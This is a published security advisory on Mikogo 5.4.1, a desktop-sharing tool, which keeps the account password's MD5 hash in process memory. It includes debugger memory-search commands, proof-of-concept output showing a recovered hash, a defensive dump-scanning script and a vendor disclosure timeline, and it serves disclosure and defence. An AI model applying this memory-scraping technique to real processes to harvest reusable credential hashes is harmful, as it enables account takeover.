
Mikogo 5.4.1.160608 Local Credentials Disclosure

Medium
Advisory ID: ZSL-2017-5439
Release Date: 23 October 2017
Vendor: Snapview GmbH - https://www.mikogo.com
Affected Version: 5.4.1.160608
CVE: N/A
Tested On: Microsoft Windows 7 Professional SP1 (EN)
Summary

Mikogo is a desktop sharing software application for web conferencing and remote support, and is provided by the online collaboration provider, BeamYourScreen GmbH. Mikogo provides its software as native downloads for Windows, Mac OS X, Linux, iOS and Android.

Description

Mikogo is vulnerable to local credentials disclosure: the supplied password is stored as an MD5 hash in process memory. A potential attacker could reveal the supplied password hash and re-use it, or store it via the configuration file, in order to gain access to the account.

0:017> s -a 0 L?80000000 "password="
0125cdad  70 61 73 73 77 6f 72 64-3d 00 00 26 6c 61 6e 67  password=..&lang
0146e6b8  70 61 73 73 77 6f 72 64-3d 00 00 00 64 6f 6d 61  password=...doma
06a422b3  70 61 73 73 77 6f 72 64-3d 34 42 33 42 38 37 34  password=482C811
0:017> da 06a422b3
06a422b3  "password=482C811DA5D5B4BC6D497FF"
06a422d3  "A98491E38...."
...
...

C:\Users\Charlie\Desktop>python mikogo_mem.py
[~] Searching for pid by process name 'Mikogo-host.exe'..
[+] Found process with pid #1116
[~] Trying to read memory for pid #1116
[+] Credentials found!
----------------------------------------
[+] MD5 Password: 482C811DA5D5B4BC6D497FFA98491E38
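A check for the residue shown above, as an added example (it is not the advisory's mikogo_mem.py and not vendor code): it scans a saved memory dump offline for the `password=` marker followed by 32 hex digits, reading in chunks so a hit split across two reads is still found, and can be used to confirm that an upgraded build no longer leaves the hash in memory in this form. The function names, chunk size and sample buffer are assumptions constructed for illustration.

```python
import io
import re

# Marker seen in the debugger output: "password=" followed by 32 hex digits.
PATTERN = re.compile(rb"password=([0-9A-Fa-f]{32})")
# One byte shorter than a full hit, so a hit split across two reads is
# completed by the next read and a complete hit is never reported twice.
OVERLAP = len(b"password=") + 32 - 1

# Constructed value, not taken from any real process.
SAMPLE_DIGEST = "0123456789ABCDEF0123456789ABCDEF"


def build_sample_dump() -> bytes:
    """Constructed buffer: two empty 'password=' fields, then one with a hash."""
    return (b"\x00" * 16 + b"password=\x00\x00&lang"
            + b"\x00" * 8 + b"password=\x00\x00\x00doma"
            + b"\x00" * 8 + b"password=" + SAMPLE_DIGEST.encode() + b"\x00\x00")


def scan_dump(stream, chunk_size=1 << 20):
    """Yield (offset, redacted_digest) for each password=<32 hex> hit."""
    tail, base = b"", 0          # base = absolute offset of tail[0]
    while True:
        chunk = stream.read(chunk_size)
        if not chunk:
            break
        buf = tail + chunk
        for m in PATTERN.finditer(buf):
            digest = m.group(1).decode("ascii")
            # Report only the first four characters: the full value is a
            # password equivalent and should not end up in logs.
            yield base + m.start(), digest[:4] + "*" * 28
        tail = buf[-OVERLAP:]
        base += len(buf) - len(tail)


if __name__ == "__main__":
    for offset, redacted in scan_dump(io.BytesIO(build_sample_dump()), 7):
        print(f"[!] password hash residue at offset {offset:#x}: {redacted}")
```

Pass any file object opened in binary mode; the empty `password=` fields in the sample are ignored because no 32-digit value follows them.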
Proof of Concept
Disclosure Timeline
03.07.2017 Vulnerability discovered.
12.07.2017 Vendor contacted.
12.07.2017 Vendor responds asking for more details.
12.07.2017 Sent details to the vendor.
13.07.2017 Vendor is investigating the issue.
31.07.2017 Asked vendor for status update.
01.08.2017 Vendor responds confirming the issue, planning to improve the way they store authentication information in their configuration file and how it is computed in the system's memory. Plans to release a fix together with further improvements in version 5.7.x within the next three months.
01.08.2017 Replied to the vendor.
14.08.2017 Asked vendor for status update.
26.08.2017 No response from the vendor.
27.08.2017 Asked vendor for status update.
29.08.2017 Vendor responds that they are in the finalization phase, which includes quality assurance and infrastructure preparations. Plans to release in November at the latest.
23.10.2017 Vendor releases version 5.9.0 to address this issue.
23.10.2017 Coordinated public security advisory released.
Credits
Vulnerability discovered by Gjoko Krstic
References
Changelog
23.10.2017 Initial release
26.10.2017 Added references [3], [4], [5] and [6]